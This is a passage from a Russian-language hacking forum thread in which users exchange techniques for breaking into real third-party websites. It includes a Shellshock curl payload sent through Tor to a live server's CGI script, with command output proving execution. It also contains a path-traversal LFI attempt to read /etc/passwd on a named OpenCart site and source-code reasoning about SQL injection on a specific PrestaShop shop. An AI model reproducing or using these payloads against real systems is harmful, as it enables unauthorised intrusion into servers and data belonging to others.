ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.02.2017, 15:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
8589
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево
и тролей тут без меня хватает
Код:
Code:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)
спасибо
|
|
|
|
15.02.2017, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
молодец, что ты разобрался. Объясни мне, зачем это ты разобрался и в чем? В ПМ, не надо тему засорять. Раз ты такой крутой разбиратель, давай в CTF поучаствуем? я участвую, когда время есть слушай я не виноват что у тебя день плохой
|
|
|
|
17.02.2017, 12:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
|
|
|
|
17.02.2017, 13:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от foozzione
foozzione said:
↑
prestashop (версия хз, как проверить тоже хз)
обнаружил такое:
http://site.ru/modules/blocklayered...ered_id_feature_20=20_8&id_category _layered=2
в ответ белая страница с:
Код:
Code:
Table 'stiliagi_new.ps_layered_category' doesn't exist
SELECT * FROM ps_layered_category WHERE id_category = 2 ORDER BY position ASC
Понятно что таким образом можно узнать имя бд, но интересует вопрос, можно ли это считать как скулю? Что бы разобраться в вопросе, не плохо было бы посмотреть исходный код который отвечает за данную обработку, в данном случае, если погуглить, как пример:
inurl:modules/blocklayered/blocklayered-ajax.php
Мы можем увидеть исходники на гитхабе:
https://github.com/PrestaShop/Presta...yered-ajax.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'/../../config/config.inc.php'[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'/../../init.php'[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'/blocklayered.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]Context[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getContext[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]controller[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]php_self[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$blockLayered[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]BlockLayered[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#0000BB"]$blockLayered[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ajaxCall[/COLOR][COLOR="#007700"]();[/[/COLOR][COLOR="#0000BB"]B[/COLOR][COLOR="#007700"]]
[/COLOR][/COLOR]
где по классу мы видим обработку класса в файле blocklayered.php
https://github.com/PrestaShop/Prest...748da7c/modules/blocklayered/blocklayered.php
участок кода:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]public function[/COLOR][COLOR="#0000BB"]hookProductListAssign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$smarty[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]Configuration[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getGlobalValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PS_LAYERED_INDEXED'[/COLOR][COLOR="#007700"]))
return;
[/COLOR][COLOR="#0000BB"]$categories_count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getInstance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]getValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'
SELECT COUNT(*)
FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_DB_PREFIX_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'layered_category
WHERE id_category = '[/COLOR][COLOR="#007700"].(int)[/COLOR][COLOR="#0000BB"]Tools[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id_category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Tools[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'id_category_layered'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Configuration[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PS_HOME_CATEGORY'[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]'
AND id_shop = '[/COLOR][COLOR="#007700"].(int)[/COLOR][COLOR="#0000BB"]Context[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getContext[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]shop[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id
[/COLOR][COLOR="#007700"]);
.....
[/COLOR][COLOR="#0000BB"]$id_shop[/COLOR][COLOR="#007700"]= (int)[/COLOR][COLOR="#0000BB"]Context[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getContext[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]shop[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];
.....
[/COLOR][COLOR="#FF8000"]/* Get the filters for the current category */
[/COLOR][COLOR="#0000BB"]$filters[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getInstance[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PS_USE_SQL_SLAVE_[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]executeS[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'
SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_DB_PREFIX_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'layered_category
WHERE id_category = '[/COLOR][COLOR="#007700"].(int)[/COLOR][COLOR="#0000BB"]$id_parent[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
AND id_shop = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_shop[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
GROUP BY `type`, id_value ORDER BY position ASC'
[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
отсюда мы видим, что данные достаточно фильтруются и принимают только INT параметр, следовательно тут скули нет!
|
|
|
18.02.2017, 05:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
9912
Репутация:
0
|
|
Есть сайт на
OpenCart 1.4.9
есть LFI
index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
как бы не переберал ../ мне все время вылезает ошибка
Warning: is_dir() expects parameter 1 to be a valid path, string given in /home/officeme/public_html/system/engine/action.php on line 16Warning: is_file() expects parameter 1 to be a valid path, string given in /home/officeme/public_html/system/engine/action.php on line 24
но не какой фаил не инклудится
в чем прикол |
|
|
|
18.02.2017, 09:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от rudu2
rudu2 said:
↑
в чем прикол Отсечение части пути нуллбайтом работает только в старых версиях PHP.
|
|
|
|
18.02.2017, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
9912
Репутация:
0
|
|
Сообщение от crlf
crlf said:
↑
Отсечение части пути нуллбайтом работает только в старых версиях PHP. тоесть обойти это нельзя никак?
|
|
|
|
18.02.2017, 15:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
276
Репутация:
0
|
|
_librusec*pro что то фильтруется у них всё, даже админку найти не мог.
|
|
|
|
18.02.2017, 16:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
|
|
|
|
18.02.2017, 16:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
